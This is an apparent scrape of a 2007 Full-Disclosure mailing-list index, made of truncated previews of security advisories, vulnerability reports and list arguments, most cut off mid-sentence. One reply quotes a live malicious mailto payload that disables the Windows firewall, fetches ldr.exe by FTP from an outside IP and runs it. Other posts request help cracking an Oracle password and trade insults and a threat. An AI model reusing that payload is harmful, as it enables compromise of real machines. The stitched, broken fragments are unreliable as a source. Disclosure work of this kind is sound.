- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200710-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
On 10/22/07, Collin R. Mulliner <[EMAIL PROTECTED]> wrote:
> dnsmasq (http://www.thekelleys.org.uk/dnsmasq/doc.html) a popular DHCP
> and DNS forwarder and cache server used on many DSL/Cable routers now
> has a simple DNS Rebinding protection mechanism. When executed with the
> --stop-dns-rebind o
In case you are interested... messages like the following were spammed
to my users tonight.
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
---
> From [EMAIL PROTECTED] Tue Oct 23 18:20:46 2007
hello Mr Fabien Kraemer:
I have download the rainbowrack 1.2-src.But I don't know how to use the
tools to find the password of the oracle user password .Would you tell me how
to do it or give me an example. Thank you .
___
Full-Disclosure - We
Hey all. I've created a fully working PoC for DNS Recursion bandwidth
amplification attacks. Enjoy.
spoofer2.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and s
On 10/23/07, Paul Szabo <[EMAIL PROTECTED]> wrote:
> In case you are interested... messages like the following were spammed
> to my users tonight.
Thanks for the heads-up.
I figured I'd check out Adobe's workaround :
http://www.adobe.com/support/security/bulletins/apsb07-18.html
... and there, i
On Tue, 23 Oct 2007, Nick Boyce wrote:
>> # To Disable mailto (recommended)
>> Modify tSchemePerms by setting the mailto: value to 3:
>> version:1|shell:3|hcp:3|ms-help:3|ms-its:3|
>> ms-itss:3|its:3|mk:3|mhtml:3|help:3|disk:3|afp:3|disks:3|telnet:3|ssh:3|acrobat:2|mailto:3|file:2
>
> And now I'm
http://www.airscanner.com/security/07101401_mobilespy.htm
*Airscanner Mobile Security Advisory #07101401:
Mobile-spy Victim/User Phone/SMS/URL Log Spoofing and Persistent XSS
Injection*
*Product:*
Mobile-spy Product and Website
*Platform:*
NA
*Requirements:*
NA
* Credits:*
Seth Fogie
Airscann
[vuln.sg] Vulnerability Research Advisory
IBM Lotus Notes Attachment Viewer Buffer Overflow Vulnerabilities
by Tan Chew Keong
Release Date: 2007-10-23
Summary
---
Multiple exploitable buffer overflow vulnerabilities were found within
the file attachment viewer in IBM Lotus Notes. The vulnera
In the last three months IRM has discovered a total of 13 new security
vulnerabilities in Cisco IOS. These vulnerabilities were reported to
Cisco and have all been allocated PSIRT reference numbers while the root
cause and potential impact of each is investigated. Cisco has taken all
the vulnerabil
Dear Paul Szabo,
Messages like this I've got are PDF spam without attempt to exploit
something, and are spammed since July. Not sure about this one though.
--Tuesday, October 23, 2007, 4:18:52 PM, you wrote to
full-disclosure@lists.grok.org.uk:
PS> In case you are interested... messages l
good.we all know :)
On 10/23/07, Andy Davis <[EMAIL PROTECTED]> wrote:
> In the last three months IRM has discovered a total of 13 new security
> vulnerabilities in Cisco IOS. These vulnerabilities were reported to
> Cisco and have all been allocated PSIRT reference numbers while the root
> cause
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
3proxy double free vulnerability
[Security Advisory]
Advisory: [AD_LAB-07006] 3proxy double free vulnerability
Class: Design Error
DATE:10/22/2007
CVEID:CVE-2007-5622
Vulnerable:
3proxy <=0.5.3i
Vendor:
http://www.3proxy.ru/
I.Synopsi
yes, it try to open:
mailt0:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"
PS. mailt0 == mailto
PPS. ***k
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:202
http://www.mandriva.com/security/
___
On 10/23/07, Seth Fogie <[EMAIL PROTECTED]> wrote:
>
> * Risk Level:*
> High - Spoofed log records / Injected JavaScript can lead to malware
> attacks
>
>
Risk level high and javascript do not belong together
___
Full-Disclosure - We believe in it.
Charte
Bug 1:
"The Line Printer Daemon, which provides print server functionality in
Cisco IOS is vulnerable to a software flaw whereby the length of the
hostname of the router is not checked before being copied into a fixed
size memory buffer. . However, the attacker must be able to
control the
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA 1373-2 [EMAIL PROTECTED]
http://www.debian.org/security/ Steve Kemp
October 23th, 2007
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA 1393-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Steve Kemp
October 23rd, 2007
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
shut up pdp
On Tue, 23 Oct 2007 14:31:52 -0400 reepex <[EMAIL PROTECTED]> wrote:
>
>Bug 1:
>"The Line Printer Daemon, which provides print server
>functionality in
>Cisco IOS is vulnerable to a software flaw whereby the length of
>the
>hostname of
On 10/23/07, Gregory Boyce <[EMAIL PROTECTED]> wrote:
> On Tue, 23 Oct 2007, Nick Boyce wrote:
>
> >> # To Disable mailto (recommended)
> >> Modify tSchemePerms by setting the mailto: value to 3:
> >> version:1|shell:3|hcp:3|ms-help:3|ms-its:3|
> >> ms-itss:3|its:3|mk:3|mhtml:3|help:3|disk:3|afp:3
3proxy ( http://3proxy.ru/ ) is multi-platform (Windows, Linux, Unix)
multi-protocol proxy server with abilities to mange traffic flows and
bandwidths,convert requests between different proxy types,
authenticate, authorize, control, limit and account users access and
more.
===
Ubuntu Security Notice USN-531-2 October 23, 2007
dhcp vulnerability
CVE-2007-5365
===
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Miranda IM Multiple Buffer Overflow Vulnerabilities
***Summary***
Multiple buffer overflow vulnerabilities exist in Miranda IM, a popular
open source instant messaging client.
***Scope***
These vulnerabilities have been verified in the following Miranda IM
version(s):
0.6.8
0.7.0
===
Ubuntu Security Notice USN-536-1 October 23, 2007
mozilla-thunderbird, thunderbird vulnerabilities
CVE-2006-2894, CVE-2007-1095, CVE-2007-2292, CVE-2007-3511,
CVE-2007-5334, CVE-2007-5337, CVE-2007-5338, CVE-2007-5339,
CVE-2007-
===
Ubuntu Security Notice USN-537-1 October 23, 2007
gnome-screensaver vulnerability
CVE-2007-3920
===
A security issue affects the following Ubuntu releases:
Ubuntu 7.10
T
they allow folks on Nanog to talk about "internet infrastructure recovery"
and the likes.
I appreciate its probably private sector folks admin'ing the list but c'mon,
surely the DHS have got to get a better control on what the ISP's are
talking about in public, especially on a public mailing list
On Wed, Oct 24, 2007 at 12:20:58AM +0100, worried security wrote:
> http://www.merit.edu/mail.archives/nanog/msg04104.html
Shit! Al Queda's on NANOG! All these years...what were we thinking???
Now that you've found nanog, why don't you go read the archives about
this topic being beaten to death
On 10/22/07, Anders B Jansson <[EMAIL PROTECTED]> wrote:
> [EMAIL PROTECTED] wrote:
> > Hi,
> >
> >> Oct 22 20:36:13 nms sshd[90657]: Failed password for invalid user gopher
> >> from 77.46.152.2 port 55120 ssh2
> >
> > user/password authentication for SSH? one way of cleaning up your
> > logs and
On 10/24/07, John Kinsella <[EMAIL PROTECTED]> wrote:
>
> Shit! Al Queda's on NANOG! All these years...what were we thinking???
>
> Now that you've found nanog, why don't you go read the archives about
> this topic being beaten to death.
Don't fuck with me you prick or i'll track you down.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Wed, 24 Oct 2007 01:59:15 +0100 worried security
<[EMAIL PROTECTED]> wrote:
>Don't fuck with me you prick or i'll track you down.
Hah! You could not track your own father if your momma told you
who, you lame moron.
-BEGIN PGP SIGNATURE-
On 10/24/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>
> On Wed, 24 Oct 2007 01:59:15 +0100 worried security
> <[EMAIL PROTECTED]> wrote:
>
> >Don't fuck with me you prick or i'll track you down.
>
> Hah! You could not track your own father if your momma told you
> who, you lame moron.
No? I
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
You and some other people on this list hold themselves in such high
esteem.It's just a shame no one else does.
So what military experience do you have?Or in law enforcement?For that
matter,what experience do you have in anything?Good luck in the job h
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Wed, 24 Oct 2007 02:52:38 +0100 worried security
<[EMAIL PROTECTED]> wrote:
>On 10/24/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>>
>> On Wed, 24 Oct 2007 01:59:15 +0100 worried security
>> <[EMAIL PROTECTED]> wrote:
>>
>> >Don't fuck with m
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1394-1[EMAIL PROTECTED]
http://www.debian.org/security/Thijs Kinkhorst
October 23rd, 2007
rPath Security Advisory: 2007-0222-1
Published: 2007-10-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect Deterministic Denial of Service
Updated Versions:
[EMAIL PROTECTED]:1/2.6-14.1-1
[EMAIL PROTECTED]:1/1.15.1-7.3-1
rPath Issue Tracking System:
ht
36 matches
Mail list logo
